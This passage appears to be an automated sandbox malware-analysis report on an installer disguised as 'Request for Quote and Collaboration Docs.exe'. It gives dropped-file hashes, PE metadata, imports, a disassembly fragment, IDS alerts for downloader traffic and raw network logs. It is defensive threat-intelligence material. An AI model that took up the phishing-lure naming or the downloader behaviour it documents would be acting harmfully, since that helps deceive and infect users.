                                                                                        SHA-256:95813035B4D387B4F5B8A5D43D71808BC2AC345A5D472F3830287E535A5764FA
                                                                                        SHA-512:88BB8E3B5BE3C82A947FC88A503DCC2FF325C6DD87CAB0E807DF886B559DDEA220492C7F86BC9FF2DDAAC593BC256E57CD35739C36E0A8A0C48C5AD51B4ECCFE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.:......,.......,.......\.......0$.......9.......:............................................................u.........................R...................................................................................................................................................G...J...............h...............................................................g...............................................................j..............................................................................................................................._.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):11264
                                                                                        Entropy (8bit):5.801108840712148
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:e/b2HS5ih/7i00eWz9T7PH6yeFcQMI5+Vw+EXWZ77dslFZk:ewSUmWw9T7MmnI5+/F7Kdk
                                                                                        MD5:FC90DFB694D0E17B013D6F818BCE41B0
                                                                                        SHA1:3243969886D640AF3BFA442728B9F0DFF9D5F5B0
                                                                                        SHA-256:7FE77CA13121A113C59630A3DBA0C8AAA6372E8082393274DA8F8608C4CE4528
                                                                                        SHA-512:324F13AA7A33C6408E2A57C3484D1691ECEE7C3C1366DE2BB8978C8DC66B18425D8CAB5A32D1702C13C43703E36148A022263DE7166AFDCE141DA2B01169F1C6
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: IBAN payment confirmation.exe, Detection: malicious, Browse
                                                                                        • Filename: Bank Swift and SOA PRN0072003410853_pdf.exe, Detection: malicious, Browse
                                                                                        • Filename: WC10SCPMaX.exe, Detection: malicious, Browse
                                                                                        • Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious, Browse
                                                                                        • Filename: CL714440147.exe, Detection: malicious, Browse
                                                                                        • Filename: TKnBbCiX07.exe, Detection: malicious, Browse
                                                                                        • Filename: ________.exe, Detection: malicious, Browse
                                                                                        • Filename: Snurrevoddenes.exe, Detection: malicious, Browse
                                                                                        • Filename: Eksistensberettigelsernes102.exe, Detection: malicious, Browse
                                                                                        • Filename: ALI HASSO - P02515 & P02518.exe, Detection: malicious, Browse
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....oS...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..>....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):161977
                                                                                        Entropy (8bit):1.2465706431701635
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:j91kr2E4uLB4rAvVSJUxZOKLuPYUIlh6njQqVK+P7T6r6hI4W7lD1jBCgUpo:94irAZug+TLg1cpo
                                                                                        MD5:818D9B577C6A2CCB8C8D753C89B0AEED
                                                                                        SHA1:1912E60E75B47E0AC0B0ACDB2B320F0B36D3CE22
                                                                                        SHA-256:B53DFB245A8D5A0F0FAEEC7E8B4AE273522AC29FD29B33608F9BA7F9ADB90279
                                                                                        SHA-512:91993AA2E3E2666A3945886101B2B670CD3B0D76CF3CFFF3684DCB310FE324A1C650FAB5D5D00B8CFA49B5A7713FE2DBBA6DC2D8BB8DAC7A169495E6694CE4C6
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:................(.R.............B...........f....H...................................................5....................................5........m............................./................?................4...............................l..........................................U..........................................................#....................M..............................................................g...................................................l..................f....................?.........................._..........................................................................u......x....................l....................~.......................S...C.............................................................................................).................l......................................................................................................................b...k................................................................
                                                                                        Process:C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):125418
                                                                                        Entropy (8bit):4.601746867247624
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:blC8yAsFPvs+GmbKWtHmXfWsAvI10hGL2reLheYtJZIn1F/8k:b4lP3GmDtu9+MftJZ+z
                                                                                        MD5:90C6BC002A40806606D3088F83B26292
                                                                                        SHA1:CE9EFF85BBF9F492693E59DA2EF135236F81C3EA
                                                                                        SHA-256:8782E0715D16AB95EC667E245EB7F0D08B2F3947B1323681B46E24759CE3F25A
                                                                                        SHA-512:889AA4D627C1E4B1B973D10F143D3AB828BE80EE5FBEE359D1B058780DC14225B7EA15344682DA556132F0F7BBD79823B19D22326B753C2931C45C4D890B2FD9
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.....^............^^^.sssss......````.]................Y..............%...=........|||........1.B.$$....................=........qqqq........h..t............;;;;.............&.'....p..............T.............}......##..GG............UUU..1111.......~..........-....MM..........................NN......................$$......d...........JJ.6666.uu...))))...............F..................6.A.............................>>>............................rr..~.....0......bb.........zzz........n...qqq.5.ff...............h....E.....vvvvv.i.........]].SS...W.........7...*.k......11..................{..zzz.....uu.........j......X..rrrr......;;.........xx.................l......................................:...............=...&&.........h.....................hh...............P.%.....F......`........................................DDD.........................::....;..%.........K......................J.........AA...................!!!!........ooooo..@................?.....+...........&..........
                                                                                        Process:C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                                                                                        Category:dropped
                                                                                        Size (bytes):2929
                                                                                        Entropy (8bit):7.418910042244289
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:j2XBhBOaFxHfEaq1kk1YunCRbvwxhjAxnyHIvR4SnHP7oNLpLR8Fqhr:j2XBv9Fx2kkO7RihjlovpnHPCpaQ1
                                                                                        MD5:49DAF4E74443D8502F3229468615185F
                                                                                        SHA1:9BB41BF5F382EE315893366F559FA26D57A4CD5F
                                                                                        SHA-256:E5EE495A89E55467DB6A396F012EDB6A71D2E762CFC7FC6846FE7259528BF168
                                                                                        SHA-512:EE9ABC6A19215FED64584BA24736ECBA24139CD03A75530FF351C99A25628410472A28F4EE08E87CE1F75DC79396A2A9C1AC79C399720C320437BC18993B561A
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:......JFIF...................................................( ..%...!1!%)+.....383-7(-.+...........+...+8+++-+-+-+--+--+7+---+7-7+-7-7++---++-+7--7-+7+-+..........."........................................E........................!.1AQq."a...2...BR....#3Cbr...S......4DUcs..................................................1!............?.................................................................................@...............@........'7.O|.(....i.<..M.4....vZ...-T.,~.&../...m.:.6..oe.;WZ]m[..:..:\.6U...........ey....F..m.I...6..G..S.z4..>..1p.*..E~OG.fQD.............I....$"@...9.g..]d.Ao..!.f../.oH..}.6.INNRm..l..ngV..+G...b$V.N...k.....=.........IR.KoG.qrJ...c..)..N[W..z.....h.R..Tm..*....ME....M....E...9.OI=.roU..%.&..a1p...;.\S..|..x..._U..L....w>...............A$...D....0s.F.)s.uy..\._7......DbE..z....r.E...r7|.1..}=......./.a.r.NJJs.........+...&..,...9.wm..V.ddlx.....e.f..4T.x.y>\..n....7.tu......M.gq[.6.......>.N.#....kzw,..(.QJ*K.L.......... .
                                                                                        Process:C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):461378
                                                                                        Entropy (8bit):1.252059381950645
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:s3tr+hilKd11tUzcxZg7SBobbR5FF7b7IvSog:sRVmQc3u9F7b76
                                                                                        MD5:3AD2FE4EA13486258EADDD1E5940A6D7
                                                                                        SHA1:06D0468A125D754D4534C182D79444DFB7A1CF61
                                                                                        SHA-256:E4C5F20595C446D20C978CF7B486579BA2FFC17E64B940733B40C89DF4331319
                                                                                        SHA-512:82328E01492BDB8B23555CB369279A5352B35E0B51A4A4AC88D9F9285BBDABA627FE01139B4F9669847252D5A59FC512B2463A364EFD5C33B83309D6A8985D59
                                                                                        Malicious:false
                                                                                        Preview:w......................j..........................p................................................-.......................;....................Y..........................1:....................................................................................G........B...............................................................................^.........................................................o.................'......................... .....................................F..................................................................................................................E...........................................97.....................................K...f.....r..........._...............h........+........................ ........./.............................d........m..........................b...................e.c......................................................................\...........5......t.....................b.................................
                                                                                        Process:C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):225641
                                                                                        Entropy (8bit):1.2362366155163755
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:HcPiBl7QD/ad4B+etLBBF64vscOIBiMFYnfBc1TS/HVtHlY4bDzZkmNQyFY670Fn:QaxOPt/G9V4yf7P/zZkX00b/h
                                                                                        MD5:94C4B93474D07658FCBD411A20E68532
                                                                                        SHA1:66421117EB902B48D39A1514C88C868394085FCF
                                                                                        SHA-256:50B1D7356F0CC22F2A9AE93A7CC9738C6BC0907724ACDB85F68F594333B706DC
                                                                                        SHA-512:BC1C40FF5B9FD71590E9B3E71D7B58A46E8AFBE56DFBD22C39F5DC0952ACEDC96F2BC4D8428EA0BCD75D67BD32F2B095585925CD8141063801FB128EA46F7471
                                                                                        Malicious:false
                                                                                        Preview:..........................~................................................/........[...............................................R......................R....................................................{.....................................E.........................E.....................................................8...../...................................5.............................................K...........................*.....................................k...................|.......=....................s....................................................................p...2...................................g.N................#................~......................................B..................................................J........................?............................{./.........................U................................z...........+..........................................................K..........................................A......
                                                                                        Process:C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        File Type:GTA audio index data (SDT)
                                                                                        Category:dropped
                                                                                        Size (bytes):275424
                                                                                        Entropy (8bit):7.753678142112646
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:bWtXH9WBTYSg+j9aqbdZYq1c3XAI50cO1Ovsgca25SNXxutL:bZYqEX9w1AlNctL
                                                                                        MD5:BA65B950990820D34F9394D97A103C16
                                                                                        SHA1:351EBD587E2F4DD45EEE0B4A8CF61C870224AE73
                                                                                        SHA-256:29B2AD788522D69334B01EFBC98F558BB9E16F668E828D5F4FF08FC6D8BCABEA
                                                                                        SHA-512:535A6843302B080A3A5A0B7FD8AC4A8B65D02C8AC3C75F46F4AA34B59EE7DCF8856315FFC8BC1DE2D46CDD83275DD8130745A40F1DEFF594D13EF765B0665F9B
                                                                                        Malicious:false
                                                                                        Preview:.........n.............................................JJJ.................%............<.............II.......................8.....#...................[[.........MM.....RR..........................N.......9.........SS.gg.88888.????............................. .....Y.??....4.................i...........%......D...ss..zzzz.......................X..........................................K.........>.c....44444............*..cc................h....E....:....zzz.u...LL..4....................:::......H..HH........XXX.bbb..]...............````.........................c....qqq................0....tt.{..........S........8.222...............w..???.(.H....t....................`..........;;;.........&&....!.................s..........*..V....................hh......``........N.........h....55.--.4......J........B....AAA.............................SSS.........................3...........#..l....................zzz...........................................tt....................................
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                        Entropy (8bit):7.108685137872694
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:Request for Quote and Collaboration Docs.exe
                                                                                        File size:757'168 bytes
                                                                                        MD5:1e5fbbef8f5ad057fc7b2210a2070e9b
                                                                                        SHA1:f9246fe78392d446a5082f30e18e41aa5f63d825
                                                                                        SHA256:405f0a54d76a3931ab40dd79b1119f906eb29ba1b09d5ddf64091136ca3e0344
                                                                                        SHA512:fb623b30b386bad439a817ef49cd7937bb28d88aab07d591bea7ad957e326bf5cb0f835e59324ef5e7718c8f1c27287412426967911b6eb0f3ded9f0b4cec921
                                                                                        SSDEEP:12288:xlYZmcRHO9ttIZ1/2l05p3yn9fN1GQQUzrpIRvbAz8GZTUIgXa9l218:UmcdO93IZ1xI4bU3TUFk
                                                                                        TLSH:19F4E01F5B168446EE9416F2B8A3DE43A1F4FEBC216573452D62FE1780B6F703A4E089
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................`...*......Z3.......p....@
                                                                                        Icon Hash:058cc0e474936126
                                                                                        Entrypoint:0x40335a
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x536FD79B [Sun May 11 20:03:39 2014 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                        Instruction
                                                                                        sub esp, 000002D4h
                                                                                        push ebx
                                                                                        push ebp
                                                                                        push esi
                                                                                        push edi
                                                                                        push 00000020h
                                                                                        xor ebp, ebp
                                                                                        pop esi
                                                                                        mov dword ptr [esp+14h], ebp
                                                                                        mov dword ptr [esp+10h], 00409230h
                                                                                        mov dword ptr [esp+1Ch], ebp
                                                                                        call dword ptr [00407034h]
                                                                                        push 00008001h
                                                                                        call dword ptr [004070BCh]
                                                                                        push ebp
                                                                                        call dword ptr [004072ACh]
                                                                                        push 00000008h
                                                                                        mov dword ptr [00429298h], eax
                                                                                        call 00007FECB94718FCh
                                                                                        mov dword ptr [004291E4h], eax
                                                                                        push ebp
                                                                                        lea eax, dword ptr [esp+34h]
                                                                                        push 000002B4h
                                                                                        push eax
                                                                                        push ebp
                                                                                        push 00420690h
                                                                                        call dword ptr [0040717Ch]
                                                                                        push 0040937Ch
                                                                                        push 004281E0h
                                                                                        call 00007FECB9471567h
                                                                                        call dword ptr [00407134h]
                                                                                        mov ebx, 00434000h
                                                                                        push eax
                                                                                        push ebx
                                                                                        call 00007FECB9471555h
                                                                                        push ebp
                                                                                        call dword ptr [0040710Ch]
                                                                                        cmp word ptr [00434000h], 0022h
                                                                                        mov dword ptr [004291E0h], eax
                                                                                        mov eax, ebx
                                                                                        jne 00007FECB946EA4Ah
                                                                                        push 00000022h
                                                                                        mov eax, 00434002h
                                                                                        pop esi
                                                                                        push esi
                                                                                        push eax
                                                                                        call 00007FECB9470FA6h
                                                                                        push eax
                                                                                        call dword ptr [00407240h]
                                                                                        mov dword ptr [esp+18h], eax
                                                                                        jmp 00007FECB946EB0Eh
                                                                                        push 00000020h
                                                                                        pop edx
                                                                                        cmp cx, dx
                                                                                        jne 00007FECB946EA49h
                                                                                        inc eax
                                                                                        inc eax
                                                                                        cmp word ptr [eax], dx
                                                                                        je 00007FECB946EA3Bh
                                                                                        add word ptr [eax], 0000h
                                                                                        Programming Language:
                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000x43188.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x5e680x60002f6554958e1a5093777de617d6e0bffcFalse0.6566162109375data6.419811957742583IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x90000x202d80x6009587277f9a9b39e2caf86eae07909d87False0.4733072916666667data3.757932017065988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .ndata0x2a0000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x5f0000x431880x43200ad79ab7bc0418c21ba04b90eb50d4a0cFalse0.18500494646182494data4.605797713668011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_BITMAP0x5f2b00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                        RT_ICON0x5f6180x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.1810552711779152
                                                                                        RT_DIALOG0xa16400x144dataEnglishUnited States0.5216049382716049
                                                                                        RT_DIALOG0xa17880x13cdataEnglishUnited States0.5506329113924051
                                                                                        RT_DIALOG0xa18c80x100dataEnglishUnited States0.5234375
                                                                                        RT_DIALOG0xa19c80x11cdataEnglishUnited States0.6091549295774648
                                                                                        RT_DIALOG0xa1ae80xc4dataEnglishUnited States0.5918367346938775
                                                                                        RT_DIALOG0xa1bb00x60dataEnglishUnited States0.7291666666666666
                                                                                        RT_GROUP_ICON0xa1c100x14dataEnglishUnited States1.1
                                                                                        RT_VERSION0xa1c280x258dataEnglishUnited States0.5216666666666666
                                                                                        RT_MANIFEST0xa1e800x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                        DLLImport
                                                                                        KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                        USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                        ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                        ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-03T15:23:52.321949+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949923172.217.19.174443TCP
                                                                                        2024-12-03T15:24:00.829294+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949945132.226.247.7380TCP
                                                                                        2024-12-03T15:24:03.735614+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949945132.226.247.7380TCP
                                                                                        2024-12-03T15:24:05.561688+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949959172.67.177.134443TCP
                                                                                        2024-12-03T15:24:07.095085+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949963132.226.247.7380TCP
                                                                                        2024-12-03T15:24:10.364462+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949972132.226.247.7380TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 3, 2024 15:23:49.657270908 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:49.657310009 CET44349923172.217.19.174192.168.2.9
                                                                                        Dec 3, 2024 15:23:49.657406092 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:49.669174910 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:49.669203997 CET44349923172.217.19.174192.168.2.9
                                                                                        Dec 3, 2024 15:23:51.412595034 CET44349923172.217.19.174192.168.2.9
                                                                                        Dec 3, 2024 15:23:51.412666082 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:51.413376093 CET44349923172.217.19.174192.168.2.9
                                                                                        Dec 3, 2024 15:23:51.413428068 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:51.468306065 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:51.468341112 CET44349923172.217.19.174192.168.2.9
                                                                                        Dec 3, 2024 15:23:51.468732119 CET44349923172.217.19.174192.168.2.9
                                                                                        Dec 3, 2024 15:23:51.468786955 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:51.471713066 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:51.519328117 CET44349923172.217.19.174192.168.2.9
                                                                                        Dec 3, 2024 15:23:52.321959019 CET44349923172.217.19.174192.168.2.9
                                                                                        Dec 3, 2024 15:23:52.322082996 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:52.322118998 CET44349923172.217.19.174192.168.2.9
                                                                                        Dec 3, 2024 15:23:52.322170973 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:52.322380066 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:52.322415113 CET44349923172.217.19.174192.168.2.9
                                                                                        Dec 3, 2024 15:23:52.322468996 CET49923443192.168.2.9172.217.19.174
                                                                                        Dec 3, 2024 15:23:52.478931904 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:52.478984118 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:52.479058027 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:52.479366064 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:52.479382992 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:54.177824020 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:54.177894115 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:54.207798004 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:54.207840919 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:54.208085060 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:54.208131075 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:54.211713076 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:54.255343914 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.323246956 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.323331118 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.352077961 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.352159023 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.442982912 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.443101883 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.443125963 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.443173885 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.450011015 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.450078011 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.562143087 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.562254906 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.566071033 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.566148043 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.566214085 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.566284895 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.572208881 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.572271109 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.580452919 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.580535889 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.581584930 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.581634045 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.588238001 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.588298082 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.592091084 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.592147112 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.595613956 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.595664978 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.596806049 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.596862078 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.600637913 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:57.600682020 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:57.604219913 CET44349932142.250.181.97192.168.2.9
